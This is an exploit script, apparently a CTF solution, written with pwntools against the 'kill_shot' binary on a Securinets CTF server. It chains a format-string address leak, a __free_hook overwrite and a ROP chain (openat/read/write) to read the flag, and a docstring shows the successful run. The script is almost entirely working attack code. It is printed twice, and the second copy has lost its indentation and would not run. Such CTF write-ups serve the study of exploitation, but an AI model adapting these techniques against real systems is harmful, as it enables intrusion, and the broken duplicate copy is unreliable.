hugsy/xp.py

## xp.py
#!/usr/bin/env python3.8

"""
$ ./xp.py remote
[+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done
[*] step 1: leak stuff
[+] leaked addresses:
0x563765daa240
0x563765da9b10
0x7ffd0d86b5e0
0x169ebea30560a000
0x563765daa240
0x7f85cf4adb97
[+] found elf at 563765da9000
[+] found libc at 7f85cf48c000
[*] step 2: overwrite __free_hook with scanf
[+] overwritten __free_hook
[*] step 3: trigger stack overflow
[*] Switching to interactive mode
flag{this_really_needs_a_kill_shot!_cc5dcc74acd62fa74899efaff22d8f79}\x00\x00\x00\x00\x00\x00\x00\x00
"""

import os
from pwn import *
import keystone

# context.log_level   = "debug"
context.arch        = "amd64"
context.terminal    = ["tmux", "split-window", "-v", "-p 75"]


LOCAL = True
TARGET_ELF = os.path.realpath("./kill_shot")
elf = ELF(TARGET_ELF)
TARGET_LIBC = os.path.realpath("./libc.so.6") # libc6_2.27-3ubuntu1.2_amd64.so
libc = ELF(TARGET_LIBC)

def attach(r):
    if LOCAL:
        bkps = [
            # elf.symbols["main"],
        ]
        cmds = [
            # "heap-analysis-helper",
            # "bp * $_base() + 0x10a2", # step1
            # "bp * $_base() + 0x1167", # step2
            # "bp openat",
            "continue",
        ]
        gdb.attach(r, '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds))
    return


def alloc(r, data, sz=None):
    r.sendafter(b"3- exit\n", str(1))
    if not sz: sz = len(data)
    r.sendafter(b"Size: ", str(sz))
    r.sendafter(b"Data: ", data)
    return


def free(r, idx):
    r.sendafter(b"3- exit\n", str(2))
    r.sendafter(b"Index: ", str(idx))
    return


def leave(r):
    r.sendlineafter(b"3- exit\n", str(3))
    return


def exploit(r):
    info("step 1: leak stuff")
    p = b""
    for i in range(0, 6): p+= b"%%%d$p." % (20+i,)

    r.sendafter(b"Format: ", p)
    addresses = [int(x, 16) for x in r.recvline().strip().split(b".") if x.startswith(b"0x") ]
    success("leaked addresses: ")
    for i in addresses: print(hex(i))

    stack_ret = addresses[2]-0xd8-8
    libc_leak = addresses[5]-231
    canary = addresses[3]
    elf.address = addresses[0]-0x1240
    libc.address = libc_leak-0x21ab0
    g_chunks = elf.address + 0x202080
    success(f"found elf at {elf.address:x}")
    success(f"found libc at {libc.address:x}")

    info("step 2: overwrite __free_hook with scanf")
    addr = libc.symbols["__free_hook"]
    r.sendafter(b"Pointer: ", str(addr))
    r.sendafter(b"Content: ", p64(libc.symbols["scanf"]))
    success("overwritten __free_hook")


    info("step 3: trigger stack overflow")

    if LOCAL:
        alloc(r, b"/tmp/flag.txt\0", 0x100) # 0
    else:
        alloc(r, b"/home/ctf/flag.txt\0", 0x100) # 0
    alloc(r, b"%4$s") # 1
    free(r, 1)

    rop = flat([
        # openat
        p64(elf.address + 0x00000000000012a3), # pop rdi; ret;
        p64(0),
        p64(libc.address + 0x0000000000023e8a), # pop rsi; ret;
        p64(g_chunks-0x70),
        p64(libc.address + 0x00000000000524b9), # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret; // g_chunks[0]
        p64(libc.address + 0x0000000000001b96), # pop rdx; ret;
        p64(0),
        p64(libc.symbols["openat"]),

        # read()
        p64(elf.address + 0x00000000000012a3), # pop rdi; ret;
        p64(int(sys.argv[1])),
        p64(libc.address + 0x0000000000023e8a), # pop rsi; ret;
        p64(g_chunks-0x70),
        p64(libc.address + 0x00000000000524b9), # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret; // g_chunks[0]
        p64(libc.address + 0x0000000000001b96), # pop rdx; ret;
        p64(256),
        p64(libc.symbols["read"]),

        # write()
        p64(elf.address + 0x00000000000012a3), # pop rdi; ret;
        p64(1),
        p64(libc.address + 0x0000000000023e8a), # pop rsi; ret;
        p64(g_chunks-0x70),
        p64(libc.address + 0x00000000000524b9), # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret; // g_chunks[0]
        p64(libc.address + 0x0000000000001b96), # pop rdx; ret;
        p64(256),
        p64(libc.symbols["write"]),
    ])

    r.sendline(b"A"*39 + rop)

    r.interactive()
    return 0


if __name__ == "__main__":
    if len(sys.argv)>=2:
        LOCAL = False
        r = remote("bin.q21.ctfsecurinets.com", 1338)
    else:
        r = process([elf.path, ], env={"LD_PRELOAD": libc.path})
        attach(r)

    exit(exploit(r))
	#!/usr/bin/env python3.8

	"""
	$ ./xp.py remote
	[+] Opening connection to bin.q21.ctfsecurinets.com on port 1338: Done
	[*] step 1: leak stuff
	[+] leaked addresses:
	0x563765daa240
	0x563765da9b10
	0x7ffd0d86b5e0
	0x169ebea30560a000
	0x563765daa240
	0x7f85cf4adb97
	[+] found elf at 563765da9000
	[+] found libc at 7f85cf48c000
	[*] step 2: overwrite __free_hook with scanf
	[+] overwritten __free_hook
	[*] step 3: trigger stack overflow
	[*] Switching to interactive mode
	flag{this_really_needs_a_kill_shot!_cc5dcc74acd62fa74899efaff22d8f79}\x00\x00\x00\x00\x00\x00\x00\x00
	"""

	import os
	from pwn import *
	import keystone

	# context.log_level = "debug"
	context.arch = "amd64"
	context.terminal = ["tmux", "split-window", "-v", "-p 75"]


	LOCAL = True
	TARGET_ELF = os.path.realpath("./kill_shot")
	elf = ELF(TARGET_ELF)
	TARGET_LIBC = os.path.realpath("./libc.so.6") # libc6_2.27-3ubuntu1.2_amd64.so
	libc = ELF(TARGET_LIBC)

	def attach(r):
	if LOCAL:
	bkps = [
	# elf.symbols["main"],
	]
	cmds = [
	# "heap-analysis-helper",
	# "bp * $_base() + 0x10a2", # step1
	# "bp * $_base() + 0x1167", # step2
	# "bp openat",
	"continue",
	]
	gdb.attach(r, '\n'.join(["break *{:#x}".format(x) for x in bkps] + cmds))
	return


	def alloc(r, data, sz=None):
	r.sendafter(b"3- exit\n", str(1))
	if not sz: sz = len(data)
	r.sendafter(b"Size: ", str(sz))
	r.sendafter(b"Data: ", data)
	return


	def free(r, idx):
	r.sendafter(b"3- exit\n", str(2))
	r.sendafter(b"Index: ", str(idx))
	return


	def leave(r):
	r.sendlineafter(b"3- exit\n", str(3))
	return


	def exploit(r):
	info("step 1: leak stuff")
	p = b""
	for i in range(0, 6): p+= b"%%%d$p." % (20+i,)

	r.sendafter(b"Format: ", p)
	addresses = [int(x, 16) for x in r.recvline().strip().split(b".") if x.startswith(b"0x") ]
	success("leaked addresses: ")
	for i in addresses: print(hex(i))

	stack_ret = addresses[2]-0xd8-8
	libc_leak = addresses[5]-231
	canary = addresses[3]
	elf.address = addresses[0]-0x1240
	libc.address = libc_leak-0x21ab0
	g_chunks = elf.address + 0x202080
	success(f"found elf at {elf.address:x}")
	success(f"found libc at {libc.address:x}")

	info("step 2: overwrite __free_hook with scanf")
	addr = libc.symbols["__free_hook"]
	r.sendafter(b"Pointer: ", str(addr))
	r.sendafter(b"Content: ", p64(libc.symbols["scanf"]))
	success("overwritten __free_hook")


	info("step 3: trigger stack overflow")

	if LOCAL:
	alloc(r, b"/tmp/flag.txt\0", 0x100) # 0
	else:
	alloc(r, b"/home/ctf/flag.txt\0", 0x100) # 0
	alloc(r, b"%4$s") # 1
	free(r, 1)

	rop = flat([
	# openat
	p64(elf.address + 0x00000000000012a3), # pop rdi; ret;
	p64(0),
	p64(libc.address + 0x0000000000023e8a), # pop rsi; ret;
	p64(g_chunks-0x70),
	p64(libc.address + 0x00000000000524b9), # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret; // g_chunks[0]
	p64(libc.address + 0x0000000000001b96), # pop rdx; ret;
	p64(0),
	p64(libc.symbols["openat"]),

	# read()
	p64(elf.address + 0x00000000000012a3), # pop rdi; ret;
	p64(int(sys.argv[1])),
	p64(libc.address + 0x0000000000023e8a), # pop rsi; ret;
	p64(g_chunks-0x70),
	p64(libc.address + 0x00000000000524b9), # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret; // g_chunks[0]
	p64(libc.address + 0x0000000000001b96), # pop rdx; ret;
	p64(256),
	p64(libc.symbols["read"]),

	# write()
	p64(elf.address + 0x00000000000012a3), # pop rdi; ret;
	p64(1),
	p64(libc.address + 0x0000000000023e8a), # pop rsi; ret;
	p64(g_chunks-0x70),
	p64(libc.address + 0x00000000000524b9), # mov rsi, qword ptr [rsi + 0x70]; xor eax, eax; ret; // g_chunks[0]
	p64(libc.address + 0x0000000000001b96), # pop rdx; ret;
	p64(256),
	p64(libc.symbols["write"]),
	])

	r.sendline(b"A"*39 + rop)

	r.interactive()
	return 0


	if __name__ == "__main__":
	if len(sys.argv)>=2:
	LOCAL = False
	r = remote("bin.q21.ctfsecurinets.com", 1338)
	else:
	r = process([elf.path, ], env={"LD_PRELOAD": libc.path})
	attach(r)

	exit(exploit(r))